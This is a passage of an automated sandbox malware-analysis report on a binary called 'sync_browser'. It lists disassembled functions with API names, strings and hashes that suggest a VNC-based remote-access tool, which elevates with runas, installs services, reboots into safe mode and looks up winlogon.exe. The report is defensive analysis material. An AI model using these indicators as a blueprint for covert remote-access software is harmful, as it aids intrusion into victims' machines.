                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileModuleNameShellfclose
                                                                      • String ID: \uvnckeyboardhelper.exe$p$runas
                                                                      • API String ID: 3322125093-2954907143
                                                                      • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                      • Instruction ID: 39394c1b89647f29ca3e0210760419ed980b59bc8e21dafee4aa9e12e4d4b12e
                                                                      • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                      • Instruction Fuzzy Hash: 52314135608B8695EB61AB14F4613AAB3A0FB88B50F804137DA9D83B99DF3CD114CB11
                                                                      Function 00007FF7E512EEF8 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __doserrno_close_nolock_errno
                                                                      • String ID:
                                                                      • API String ID: 186997739-0
                                                                      • Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                      • Instruction ID: 58bed7295ee352a536e92715ccaec7c84d0e892617d14260653f762774ba2318
                                                                      • Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                      • Instruction Fuzzy Hash: 4211C326E0C28AC5F3057F61B86577CA7506F81F51FD94636E61D872DACE7CA440A332
                                                                      Function 00007FF7E507A040 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseCurrentInputMessageOpen
                                                                      • String ID:
                                                                      • API String ID: 1973726940-0
                                                                      • Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                      • Instruction ID: a82f27e590622abe72658bcc573cc2ec057e8917468f163b663c383dc26f5d7b
                                                                      • Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                      • Instruction Fuzzy Hash: 69119025B1DA4982EB24BB62B464639E7A0BB4DFD0F441836EE4EC3B58DE3CD4418711
                                                                      Function 00007FF7E5073E60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56timewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Timer$KillMessageModePostQuitWindow
                                                                      • String ID: d
                                                                      • API String ID: 3664928928-2564639436
                                                                      • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                      • Instruction ID: aa5e433f895118e28a88ae8af30c9a5fac72020100f0a1a4277f9a4e19cf55c3
                                                                      • Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
                                                                      • Instruction Fuzzy Hash: B311A7B2F1860B87F7707B34B825775A290EF44BA1FC45231D91AC56D4EE3CD991CA22
                                                                      Function 00007FF7E508A6F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$Long$DialogForegroundItemText
                                                                      • String ID: Oct 1 2014 21:43:49
                                                                      • API String ID: 2747855613-2751236551
                                                                      • Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                      • Instruction ID: 3014d5cca1c240b60387ef3a932096e96c2238cd7b5690b692f2e55bdb823847
                                                                      • Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
                                                                      • Instruction Fuzzy Hash: FA119631A0CF4681E320AB26A9A473AA361FB85FD0F944132EA8A47B98DF3CD541D755
                                                                      Function 00007FF7E50C1550 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AsyncState$Virtual
                                                                      • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                                      • API String ID: 2891131044-1915745809
                                                                      • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                      • Instruction ID: a2be473cfdad0aa85a41cebfbc59de00fff76cdbbeb3fe71f97e39ea3eef9459
                                                                      • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                      • Instruction Fuzzy Hash: 2A11D332A18A9AC2E6216F14F4102AAA361FB84B05F880032E98EC7659DF3CD515C362
                                                                      Function 00007FF7E5087FB0 Relevance: 10.5, APIs: 7, Instructions: 46synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                                      • String ID:
                                                                      • API String ID: 3343876880-0
                                                                      • Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                      • Instruction ID: 3db3969fcc5efc9ae8c60e94462edcc4b0776fa73f749b994b5e1c9c32c21250
                                                                      • Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                      • Instruction Fuzzy Hash: A2214575604745D3DB68AB22E59836DA320FB45F91F405032DB1E87654DF3CE4B4C751
                                                                      Function 00007FF7E50819A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                      • String ID: winlogon.exe
                                                                      • API String ID: 1789362936-961692650
                                                                      • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                      • Instruction ID: 664712c371dd72e0b10ce73a699733e9ab0bff484843a705344e07b7a48de42f
                                                                      • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                      • Instruction Fuzzy Hash: 08112831608A8E81E720AB25F865767B3A0FF88F95F845132D55E86698EF3CD505CA11
                                                                      Function 00007FF7E5083620 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -rebootforce$p$runas
                                                                      • API String ID: 3648085421-45594291
                                                                      • Opcode ID: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                      • Instruction ID: 479bdbbad42336b06dd2ff58d54053efc831bdfef4747b77756f8b197db15ad2
                                                                      • Opcode Fuzzy Hash: c9e64b892c4310a2a8aa35deb39eabc56664ec1848822a0344db8a204f455f45
                                                                      • Instruction Fuzzy Hash: FB010C35608B8585E721AF14F49439BB3A4FB88744F800136D6CD42B58DF3CD158CB51
                                                                      Function 00007FF7E50836C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -rebootsafemode$p$runas
                                                                      • API String ID: 3648085421-4291177908
                                                                      • Opcode ID: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                      • Instruction ID: 8e35c1b32feb455a0a471f77f7ad21e29ca3c9c3ec182cc29e2fa95759eb7cf7
                                                                      • Opcode Fuzzy Hash: ebe23701378919e1af33a6bf656780ce82059cac4ad0fb8edc734de712cd212d
                                                                      • Instruction Fuzzy Hash: 2E010C35608B8585E721AF14F49439BB3A4FB88744FC00136D6CD42B18DF3CD158CB51
                                                                      Function 00007FF7E5079910 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -stopservice$p$runas
                                                                      • API String ID: 3648085421-4230321595
                                                                      • Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                      • Instruction ID: 3d776a63b8f9d1b45a241ea21b84b966afc5f7356ce92316450d029749069fa7
                                                                      • Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                      • Instruction Fuzzy Hash: 2F01DA36618B85C5E760AB10F4A439BB3A4FB89B48FC01236D6CD42B58EF7DD118CB51
                                                                      Function 00007FF7E5079A70 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -install$p$runas
                                                                      • API String ID: 3648085421-1683557327
                                                                      • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                      • Instruction ID: 8bd8b338ab0b271e5d1a5b0b70964bf6236212084a412dadfa6b44e5647bb9ba
                                                                      • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                      • Instruction Fuzzy Hash: 5801DA36608B8585E760AB10F4A439BB3A4FB89B48FC01236D6CD42B58EF7DD118CB51
                                                                      Function 00007FF7E50799C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                      • String ID: -startservice$p$runas
                                                                      • API String ID: 3648085421-278061118
                                                                      • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                      • Instruction ID: 9a8d4eb680a18ba2bb023cda75cb143b95f3156e9303fada991ac4f2706fa7fe
                                                                      • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                      • Instruction Fuzzy Hash: 0B01DA36608B8585E760AB10F4A439BB3A4FB89B48FC01236D6CD42B58EF7DD118CB51
